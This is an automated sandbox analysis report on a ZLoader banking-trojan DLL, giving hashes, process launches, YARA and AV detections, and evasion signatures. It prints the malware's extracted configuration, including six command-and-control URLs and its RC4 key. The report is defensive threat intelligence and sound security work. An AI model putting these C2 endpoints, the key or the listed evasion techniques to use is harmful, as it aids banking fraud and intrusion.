Play interactive tour

Edit tour

Analysis Report LbSpXJz6Ey.dll

Overview

General Information

Sample Name:	LbSpXJz6Ey.dll
Analysis ID:	388620
MD5:	d6904948ae99d7bf84e6af9a978c3ae6
SHA1:	a272ccd04db93604874c8606e4f41ad8bb212540
SHA256:	938f890613dc8526bb828c3de5d5c612b7c13515062fb6ca15f8abc1424f2835
Tags:	dllnutZLoader
Infos:
Most interesting Screenshot:

Detection

ZLoader

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected ZLoader

C2 URLs / IPs found in malware configuration

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

PE file contains an invalid checksum

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Startup

System is w10x64

loaddll32.exe (PID: 6548 cmdline: loaddll32.exe 'C:\Users\user\Desktop\LbSpXJz6Ey.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)

cmd.exe (PID: 6588 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\LbSpXJz6Ey.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)

rundll32.exe (PID: 6636 cmdline: rundll32.exe 'C:\Users\user\Desktop\LbSpXJz6Ey.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6624 cmdline: rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Drawmorning@8 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6684 cmdline: rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_ExpectRemember@0 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6708 cmdline: rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Offmark@0 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

rundll32.exe (PID: 6724 cmdline: rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Providesea@8 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)

cleanup

Malware Configuration

Threatname: ZLoader

{"C2 list": ["https://jiaayanu.com/post.php", "https://investinszeklerland.eu/post.php", "https://iqs-sac.com/post.php", "https://jciems.in/post.php", "https://jinnahofficersschool.com/post.php", "https://kancagh.com/post.php"], "RC4 Key": "dh8f3@3hdf#hsf23", "Botnet": "nut", "Campaign": "13/04"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000003.583049899.0000000002740000.00000040.00000001.sdmp	JoeSecurity_ZLoader_2	Yara detected ZLoader	Joe Security
00000005.00000003.585834648.0000000004960000.00000040.00000001.sdmp	JoeSecurity_ZLoader_2	Yara detected ZLoader	Joe Security
00000006.00000002.647580754.000000006E191000.00000020.00020000.sdmp	JoeSecurity_ZLoader_2	Yara detected ZLoader	Joe Security
00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp	JoeSecurity_ZLoader_2	Yara detected ZLoader	Joe Security
00000005.00000002.612647390.000000006E191000.00000020.00020000.sdmp	JoeSecurity_ZLoader_2	Yara detected ZLoader	Joe Security

Unpacked PEs

Source	Rule	Description	Author
5.3.rundll32.exe.4975cf4.0.raw.unpack	JoeSecurity_ZLoader_2	Yara detected ZLoader	Joe Security
5.3.rundll32.exe.4975cf4.0.unpack	JoeSecurity_ZLoader_2	Yara detected ZLoader	Joe Security
5.2.rundll32.exe.6e190000.1.unpack	JoeSecurity_ZLoader_2	Yara detected ZLoader	Joe Security
4.3.rundll32.exe.2755cf4.0.raw.unpack	JoeSecurity_ZLoader_2	Yara detected ZLoader	Joe Security
4.3.rundll32.exe.2755cf4.0.unpack	JoeSecurity_ZLoader_2	Yara detected ZLoader	Joe Security
6.2.rundll32.exe.6e190000.1.unpack	JoeSecurity_ZLoader_2	Yara detected ZLoader	Joe Security
4.2.rundll32.exe.6e190000.1.unpack	JoeSecurity_ZLoader_2	Yara detected ZLoader	Joe Security
Click to see the 2 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 5.3.rundll32.exe.4975cf4.0.raw.unpack

Malware Configuration Extractor: ZLoader {"C2 list": ["https://jiaayanu.com/post.php", "https://investinszeklerland.eu/post.php", "https://iqs-sac.com/post.php", "https://jciems.in/post.php", "https://jinnahofficersschool.com/post.php", "https://kancagh.com/post.php"], "RC4 Key": "dh8f3@3hdf#hsf23", "Botnet": "nut", "Campaign": "13/04"}

Multi AV Scanner detection for submitted file

Show sources

Source: LbSpXJz6Ey.dll	Virustotal: Detection: 39%	Perma Link
Source: LbSpXJz6Ey.dll	Metadefender: Detection: 26%	Perma Link
Source: LbSpXJz6Ey.dll	ReversingLabs: Detection: 44%

Source: LbSpXJz6Ey.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: LbSpXJz6Ey.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source:

Binary string: c:\position\Trade\Hair than\Sight.pdb source: loaddll32.exe, 00000001.00000002.646001738.000000006E212000.00000004.00020000.sdmp, rundll32.exe, 00000004.00000002.661497710.000000006E217000.00000004.00020000.sdmp, rundll32.exe, 00000005.00000002.612708689.000000006E204000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.655853498.000000006E204000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.610813810.000000006E212000.00000004.00020000.sdmp, rundll32.exe, 00000008.00000002.628765478.000000006E212000.00000004.00020000.sdmp, LbSpXJz6Ey.dll

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then movzx eax, word ptr [ebp+0Ch]	4_2_6E19FA10
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then mov eax, dword ptr [edi-08h]	4_2_6E1AB200
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then mov eax, esi	4_2_6E1AFA40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then test bl, bl	4_2_6E1AAE80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push 68653F5Eh	4_2_6E19F420
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then test ebx, ebx	4_2_6E1A5C80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then mov byte ptr [ebp+eax-50h], cl	4_2_6E1A04E0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then push ebx	4_2_6E1A9DA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4x nop then lea ebx, dword ptr [ebp-34h]	4_2_6E1AC9E0

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	IPs: https://jiaayanu.com/post.php
Source: Malware configuration extractor	IPs: https://investinszeklerland.eu/post.php
Source: Malware configuration extractor	IPs: https://iqs-sac.com/post.php
Source: Malware configuration extractor	IPs: https://jciems.in/post.php
Source: Malware configuration extractor	IPs: https://jinnahofficersschool.com/post.php
Source: Malware configuration extractor	IPs: https://kancagh.com/post.php

Source: loaddll32.exe, 00000001.00000002.646024059.000000006E232000.00000002.00020000.sdmp, rundll32.exe, 00000004.00000002.661511442.000000006E232000.00000002.00020000.sdmp, rundll32.exe, 00000005.00000002.613754347.000000006E232000.00000002.00020000.sdmp, rundll32.exe, 00000006.00000002.658068139.000000006E232000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.610821067.000000006E232000.00000002.00020000.sdmp, rundll32.exe, 00000008.00000002.628771772.000000006E232000.00000002.00020000.sdmp, LbSpXJz6Ey.dll

String found in binary or memory: http://openspot.de

Source: loaddll32.exe, 00000001.00000002.644850329.0000000000A7B000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected ZLoader

Show sources

Source: Yara match	File source: 00000004.00000003.583049899.0000000002740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.585834648.0000000004960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.647580754.000000006E191000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.612647390.000000006E191000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.4975cf4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.4975cf4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6e190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2755cf4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2755cf4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.6e190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6e190000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1A9EA4	1_2_6E1A9EA4
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1AA7F0	1_2_6E1AA7F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1A9C63	1_2_6E1A9C63
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1AA57C	1_2_6E1AA57C
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1A9A31	1_2_6E1A9A31
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1AAA55	1_2_6E1AAA55
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1C7291	1_2_6E1C7291
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1AA317	1_2_6E1AA317
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E19DBDC	1_2_6E19DBDC
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1AA0D6	1_2_6E1AA0D6
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1C7171	1_2_6E1C7171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1A0230	4_2_6E1A0230
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E197C20	4_2_6E197C20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E193880	4_2_6E193880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E198CA0	4_2_6E198CA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E192550	4_2_6E192550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1961F0	4_2_6E1961F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1BDF30	4_2_6E1BDF30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1C976C	4_2_6E1C976C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1BE450	4_2_6E1BE450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1C7291	4_2_6E1C7291
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1BE880	4_2_6E1BE880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1C7171	4_2_6E1C7171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1C19BF	4_2_6E1C19BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1BDF30	5_2_6E1BDF30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1C976C	5_2_6E1C976C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1BE450	5_2_6E1BE450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1C7291	5_2_6E1C7291
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1BE880	5_2_6E1BE880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1C7171	5_2_6E1C7171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1C19BF	5_2_6E1C19BF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1BDF30	6_2_6E1BDF30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1C976C	6_2_6E1C976C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1BE450	6_2_6E1BE450
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1C7291	6_2_6E1C7291
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1BE880	6_2_6E1BE880
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1C7171	6_2_6E1C7171
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1C19BF	6_2_6E1C19BF

Source: C:\Windows\System32\loaddll32.exe

Code function: String function: 6E19AAE0 appears 41 times

Source: LbSpXJz6Ey.dll

Binary or memory string: OriginalFilenameSight.dllj% vs LbSpXJz6Ey.dll

Source: LbSpXJz6Ey.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: classification engine

Classification label: mal68.troj.winDLL@13/0@0/1

Source: LbSpXJz6Ey.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Drawmorning@8

Source: LbSpXJz6Ey.dll	Virustotal: Detection: 39%
Source: LbSpXJz6Ey.dll	Metadefender: Detection: 26%
Source: LbSpXJz6Ey.dll	ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\LbSpXJz6Ey.dll'
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\LbSpXJz6Ey.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Drawmorning@8
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\LbSpXJz6Ey.dll',#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_ExpectRemember@0
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Offmark@0
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Providesea@8
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\LbSpXJz6Ey.dll',#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Drawmorning@8	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_ExpectRemember@0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Offmark@0	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\LbSpXJz6Ey.dll,_Providesea@8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\LbSpXJz6Ey.dll',#1	Jump to behavior

Source: LbSpXJz6Ey.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LbSpXJz6Ey.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LbSpXJz6Ey.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LbSpXJz6Ey.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LbSpXJz6Ey.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LbSpXJz6Ey.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: LbSpXJz6Ey.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: LbSpXJz6Ey.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: LbSpXJz6Ey.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LbSpXJz6Ey.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LbSpXJz6Ey.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LbSpXJz6Ey.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LbSpXJz6Ey.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: LbSpXJz6Ey.dll

Static PE information: real checksum: 0xb66e2 should be: 0xab31a

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1CAD03 push ecx; ret	1_2_6E1CAD16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1AC720 push eax; ret	4_2_6E1AC72A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E1CAD03 push ecx; ret	4_2_6E1CAD16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E1CAD03 push ecx; ret	5_2_6E1CAD16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_6E1CAD03 push ecx; ret	6_2_6E1CAD16

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe

Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E19AE86 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_6E19AE86

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1ADFA0 mov eax, dword ptr fs:[00000030h]	1_2_6E1ADFA0
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1B726E mov eax, dword ptr fs:[00000030h]	1_2_6E1B726E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E19F2B0 mov eax, dword ptr fs:[00000030h]	4_2_6E19F2B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E2144D9 mov eax, dword ptr fs:[00000030h]	4_2_6E2144D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E21440F mov eax, dword ptr fs:[00000030h]	4_2_6E21440F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_6E214016 push dword ptr fs:[00000030h]	4_2_6E214016
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E2144D9 mov eax, dword ptr fs:[00000030h]	5_2_6E2144D9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E21440F mov eax, dword ptr fs:[00000030h]	5_2_6E21440F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 5_2_6E214016 push dword ptr fs:[00000030h]	5_2_6E214016

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E19AE86 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6E19AE86
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E1AD780 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_6E1AD780
Source: C:\Windows\System32\loaddll32.exe	Code function: 1_2_6E19A7A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_6E19A7A8

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\LbSpXJz6Ey.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000001.00000002.645863904.0000000000F00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.651085141.0000000002C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.612600311.0000000003550000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.646520208.0000000002C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.610686780.0000000002C20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.628677755.0000000003640000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000001.00000002.645863904.0000000000F00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.651085141.0000000002C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.612600311.0000000003550000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.646520208.0000000002C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.610686780.0000000002C20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.628677755.0000000003640000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000001.00000002.645863904.0000000000F00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.651085141.0000000002C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.612600311.0000000003550000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.646520208.0000000002C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.610686780.0000000002C20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.628677755.0000000003640000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: loaddll32.exe, 00000001.00000002.645863904.0000000000F00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.651085141.0000000002C40000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.612600311.0000000003550000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.646520208.0000000002C80000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.610686780.0000000002C20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.628677755.0000000003640000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E19ACA6 cpuid

1_2_6E19ACA6

Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6E1B1254
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	1_2_6E1B1154
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_6E1C26FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	4_2_6E1C1F54
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	4_2_6E1C25D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6E1C225F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6E1C22FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	4_2_6E1C2385
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	4_2_6E1C2804
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_6E1C28D3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	4_2_6E1C21F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	5_2_6E1C26FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	5_2_6E1C1F54
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	5_2_6E1C25D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_6E1C225F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_6E1C22FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	5_2_6E1C2385
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	5_2_6E1C2804
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	5_2_6E1C28D3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	5_2_6E1C21F6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_6E1C26FE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	6_2_6E1C1F54
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	6_2_6E1C25D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_6E1C225F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_6E1C22FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	6_2_6E1C2385
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	6_2_6E1C2804
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_6E1C28D3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	6_2_6E1C21F6

Source: C:\Windows\System32\loaddll32.exe

Code function: 1_2_6E19B08B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

1_2_6E19B08B

Stealing of Sensitive Information:

Yara detected ZLoader

Show sources

Source: Yara match	File source: 00000004.00000003.583049899.0000000002740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.585834648.0000000004960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.647580754.000000006E191000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.656327415.000000006E191000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.612647390.000000006E191000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 5.3.rundll32.exe.4975cf4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.rundll32.exe.4975cf4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.rundll32.exe.6e190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2755cf4.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.rundll32.exe.2755cf4.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.rundll32.exe.6e190000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.rundll32.exe.6e190000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected ZLoader

Show sources

Source: Yara match	File source: 00000004.00000003.583049899.0000000002740000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.585834648.0000000004960000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.647580754.000000006E191000.00000020.00020000.sdmp, type: MEMORY
